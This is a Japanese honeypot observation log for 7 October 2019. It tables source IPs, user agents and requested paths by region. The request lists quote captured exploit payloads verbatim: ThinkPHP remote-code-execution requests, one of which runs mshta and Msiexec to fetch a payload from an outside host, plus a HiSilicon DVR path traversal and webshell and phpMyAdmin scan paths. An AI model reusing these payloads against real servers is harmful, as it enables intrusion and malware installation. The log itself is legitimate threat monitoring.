ハニーポット(仮) 観測記録 2019/10/07分です。

特徴

Region：AP

ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
を確認しました。

Region：US

HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
を確認しました。

Region：EU

ThinkPHPの脆弱性を狙うアクセス
を確認しました。

他

アクセス数推移

AP：総アクセス数：287 (前日比：+247)
US：総アクセス数：15 (前日比：-114)
EU：総アクセス数：23 (前日比：+4)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region：AP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	108.189.182.36	United States
1	114.144.201.34	Japan
1	118.163.20.215	Taiwan
2	119.29.132.198	China
1	125.75.126.222	China
1	14.29.115.50	China
2	156.238.3.97	United States
1	159.203.197.157	United States
1	159.203.197.175	United States
1	159.203.201.176	United States
1	159.203.201.221	United States
1	162.243.69.215	United States
225	172.245.135.43	United States
2	173.229.142.165	United States
4	180.167.180.242	China
2	182.254.243.249	China
1	185.27.60.234	Hungary
2	201.46.39.42	Brazil
2	202.181.25.41	Hong Kong
2	212.112.116.231	Kyrgyzstan
2	221.215.74.210	China
4	222.186.130.42	China
2	222.214.141.110	China
2	223.244.82.193	China
2	37.75.10.130	Turkey
1	42.189.121.170	Malaysia
2	45.88.6.126	Hong Kong
2	47.104.253.220	China
2	49.49.245.244	Thailand
1	54.36.148.13	France
1	78.152.196.95	Ireland
1	79.215.122.14	Germany
1	80.247.20.209	United Kingdom
4	82.221.105.7	Iceland
1	84.54.187.137	Bulgaria
1	89.148.50.228	Bahrain
4	93.174.93.178	Netherlands

UserAgent一覧

件数	UserAgent
6	-
6	-
4	ApiTool
2	Go-http-client/1.1
6	Hi
19	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
3	Mozilla/5.0
1	Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)
2	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
3	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
1	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
97	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
118	Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
2	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
1	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2	Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
4	Mozilla/5.0 zgrab/0.x
1	python-requests/2.10.0
2	python-requests/2.22.0
1	;s:3:\

リクエスト内容一覧

件数	Method	Request	Protocol
1	GET	/shaAdmin/index.php	HTTP/1.1
1	GET	/shell?busybox	HTTP/1.1
2	GET	/shell.php	HTTP/1.1
1	GET	/shopdb/index.php	HTTP/1.1
9	GET	/?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op[.]Cnazb[.]Xyz/PHP1.jpg%20/Q)\",0)(window.close)
1	GET	/s/index.php	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/spider.php	HTTP/1.1
1	GET	/sqladmin/index.php	HTTP/1.1
1	GET	/sql/index.php	HTTP/1.1
1	GET	/SQL/index.php	HTTP/1.1
1	GET	/t6nv.php	HTTP/1.1
1	GET	/taisui.php	HTTP/1.1
2	GET	/test.php	HTTP/1.1
1	GET	/text.php	HTTP/1.1
1	GET	/tools/phpMyAdmin/index.php	HTTP/1.1
3	GET	/TP/index.php	HTTP/1.1
2	GET	/TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
4	GET	/TP/public/index.php	HTTP/1.1
1	GET	/typo3/phpmyadmin/index.php	HTTP/1.1
1	GET	/undx.php	HTTP/1.1
1	GET	/uploader.php	HTTP/1.1
1	GET	/up.php	HTTP/1.1
1	GET	/v/index.php	HTTP/1.1
1	GET	/weathermap/editor.php	HTTP/1.1
2	GET	/webdav/	HTTP/1.1
1	GET	/web/phpMyAdmin/index.php	HTTP/1.1
1	GET	/websql/index.php	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/woshimengmei.php	HTTP/1.1
1	GET	/wp-config.php	HTTP/1.1
1	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php	HTTP/1.1
1	GET	/wpc.php	HTTP/1.1
1	GET	/wpo.php	HTTP/1.1
1	GET	/www/phpMyAdmin/index.php	HTTP/1.1
1	GET	/WWW/phpMyAdmin/index.php	HTTP/1.1
1	GET	/xampp/phpmyadmin/index.php	HTTP/1.1
1	GET	/xiaoxia.php	HTTP/1.1
1	GET	/xiaxia.php	HTTP/1.1
1	GET	/xiu.php	HTTP/1.1
1	GET	/x.php	HTTP/1.1
1	GET	/xsser.php	HTTP/1.1
1	GET	/yu.php	HTTP/1.1
1	GET	/yuyang.php	HTTP/1.1
1	GET	/z.php	HTTP/1.1
1	GET	/zz.php	HTTP/1.1
1	GET	/zzz.php	HTTP/1.1
1	POST	/%75%73%65%72%2e%70%68%70	HTTP/1.1
4	POST	/editBlackAndWhiteList	HTTP/1.1
1	POST	/function.inc.php	HTTP/1.1
1	POST	/sample.php	HTTP/1.1
2	POST	/TP/index.php?s=captcha	HTTP/1.1
1	PROPFIND	/	HTTP/1.1

Region:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	113.160.47.142	Vietnam
1	118.101.163.78	Malaysia
1	159.203.201.119	United States
1	159.203.201.242	United States
1	178.54.86.119	Ukraine
1	185.84.174.225	Russia
2	222.163.45.160	China
1	27.50.132.171	China
1	34.76.33.39	United States
1	42.188.206.106	Malaysia
1	45.66.104.110	Hungary
1	58.255.36.101	China
1	64.72.87.182	United States
1	93.174.93.178	Netherlands

UserAgent一覧

件数	UserAgent
1	-
1	ApiTool
3	Hi
5	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
2	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
1	GET	/auth1.html	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/manager/text/list	HTTP/1.1
1	GET	../../mnt/custom/ProductDefinition	HTTP
3	GET	/Pages/login.htm	HTTP/1.1
1	GET	/phpmyadmin/index.php	HTTP/1.1
5	GET	/public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	POST	/editBlackAndWhiteList	HTTP/1.1

Region:EU

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	104.222.32.244	United States
10	106.13.99.175	China
2	113.96.223.207	China
1	115.231.91.7	China
1	154.81.196.62	Seychelles
1	27.124.47.10	Hong Kong
1	39.98.65.104	China
1	61.219.11.153	Taiwan
1	68.183.188.21	United States
2	77.247.110.31	Netherlands
1	85.209.42.138	United States
1	93.174.93.178	Netherlands

UserAgent一覧

件数	UserAgent
4	-
1	ApiTool
2	curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2
1	Go-http-client/1.1
5	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
1	Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数	Method	Request	Protocol
1	-
1	CONNECT	xui.ptlogin2.qq.com:443	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/getip	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
2	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
5	GET	/public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/VSR3/extjs/ext-all-js/ext.axd?v=21133	HTTP/1.1
1	GET	/VSR3/Forms/Login/Login.aspx	HTTP/1.1
1	OPTION	/	HTTP/1.1
1	POST	/editBlackAndWhiteList	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1